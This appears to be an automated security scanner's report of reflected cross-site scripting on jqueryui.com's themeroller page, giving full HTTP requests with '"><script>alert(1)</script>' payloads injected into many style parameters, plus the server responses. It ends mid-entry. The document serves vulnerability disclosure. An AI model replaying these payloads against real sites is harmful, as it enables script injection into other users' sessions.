GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7542e74"><script>alert(1)</script>29c3c2098a8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:03:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d04"><script>alert(1)</script>ac048d79a1b was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=086d04"><script>alert(1)</script>ac048d79a1b&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:06:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3880d"><script>alert(1)</script>af0b4bd8dde was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=03880d"><script>alert(1)</script>af0b4bd8dde&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:07:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de2"><script>alert(1)</script>ab3d44f3d57 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb0de2"><script>alert(1)</script>ab3d44f3d57&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:04:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca57"><script>alert(1)</script>6ca0f80160 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngcca57"><script>alert(1)</script>6ca0f80160&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:01:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 119999
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 338a7"><script>alert(1)</script>d2e8c6a5d6d was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png338a7"><script>alert(1)</script>d2e8c6a5d6d&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:02:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313a3"><script>alert(1)</script>7e95a01d9ea was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png313a3"><script>alert(1)</script>7e95a01d9ea&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffca3"><script>alert(1)</script>afead0cc52e was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngffca3"><script>alert(1)</script>afead0cc52e&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4afd"><script>alert(1)</script>5ee5c68dd88 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pnga4afd"><script>alert(1)</script>5ee5c68dd88&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e499b"><script>alert(1)</script>612f13c5053 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnge499b"><script>alert(1)</script>612f13c5053&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:03:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f025"><script>alert(1)</script>0e1f745eeea was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png4f025"><script>alert(1)</script>0e1f745eeea&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:06:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d5c"><script>alert(1)</script>be656200160 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png89d5c"><script>alert(1)</script>be656200160&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:07:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120001
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5f3"><script>alert(1)</script>c758123b355 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaaea5f3"><script>alert(1)</script>c758123b355&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:04:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c49"><script>alert(1)</script>ad9a9cee216 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
